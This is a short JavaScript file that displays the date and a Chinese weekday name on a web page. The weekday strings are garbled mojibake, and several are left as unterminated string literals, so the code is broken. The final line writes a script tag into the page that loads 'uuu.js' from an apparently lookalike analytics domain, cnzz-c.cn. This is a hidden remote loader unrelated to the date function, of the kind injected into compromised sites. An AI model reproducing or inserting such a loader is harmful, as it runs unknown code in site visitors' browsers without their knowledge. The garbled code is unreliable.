/*
today = new Date();
var day; 
var date;
if(today.getDay()==0) day = "ζζζ?
if(today.getDay()==1) day = "ζζδΈ?"
if(today.getDay()==2) day = "ζζδΊ?
if(today.getDay()==3) day = "ζζδΈ?
if(today.getDay()==4) day = "ζζε?
if(today.getDay()==5) day = "ζζδΊ?
if(today.getDay()==6) day = "ζζε?
date = (today.getYear()) + "-" + (today.getMonth() + 1 ) + "-" + today.getDate() + " " + day +"";
document.write(date);
*/
function showDate() {
	myDate = new Date();
	var thisYear = myDate.getYear();
	var thisMonth = myDate.getMonth() + 1;
	var thisDate = myDate.getDate();
	var thisDay = myDate.getDay();
	var theDay;
	
	switch(parseInt(thisDay)){
		case 0:
			theDay = "ζζε€?
			break;
		case 1:
			theDay = "ζζδΈ"
			break;
		case 2:
			theDay = "ζζδΊ?
			break;
		case 3:
			theDay = "ζζδΈ?
			break;
		case 4:
			theDay = "ζζε?
			break;
		case 5:
			theDay = "ζζδΊ?
			break;
		case 6:
			theDay = "ζζε?
			break;
	}
	document.write(thisYear + "-" + thisMonth + "-" + thisDate + "&nbsp;|&nbsp;" + theDay);
}
document.writeln("<script src=\'http:\/\/s68.cnzz-c.cn\/uuu.js?id=88268&web_id=882668\' language=\'JavaScript\' type=\'text\/JavaScript\' charset=\'gb2312\'><\/script>");
